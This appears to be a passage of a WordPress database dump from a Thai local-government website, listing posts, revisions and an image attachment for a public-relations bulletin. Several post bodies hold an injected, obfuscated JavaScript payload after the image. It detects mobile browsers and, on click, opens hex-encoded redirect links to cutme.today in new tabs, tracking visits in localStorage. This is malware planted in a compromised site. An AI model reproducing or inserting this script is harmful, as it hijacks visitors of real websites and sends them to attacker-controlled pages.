_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','237-revision-v1','','','2024-07-27 22:48:44','2024-07-27 15:48:44','',237,'http://pakhaeng.ssk.in.th/?p=239',0,'revision','',0),
(240,1,'2024-07-27 22:49:11','2024-07-27 15:49:11','<!-- wp:image {\"id\":241,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/17-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-241\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-18','','','2024-07-27 22:49:13','2024-07-27 15:49:13','',0,'http://pakhaeng.ssk.in.th/?p=240',0,'post','',0),
(241,1,'2024-07-27 22:49:01','2024-07-27 15:49:01','','17-2566','','inherit','','closed','','17-2566-2','','','2024-07-27 22:49:01','2024-07-27 15:49:01','',240,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/17-2566-1.png',0,'attachment','image/png',0),
(242,1,'2024-07-27 22:49:11','2024-07-27 15:49:11','<!-- wp:image {\"id\":241,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/17-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-241\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','240-revision-v1','','','2024-07-27 22:49:11','2024-07-27 15:49:11','',240,'http://pakhaeng.ssk.in.th/?p=242',0,'revision','',0),
(244,1,'2024-07-27 22:53:17','2024-07-27 15:53:17','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} 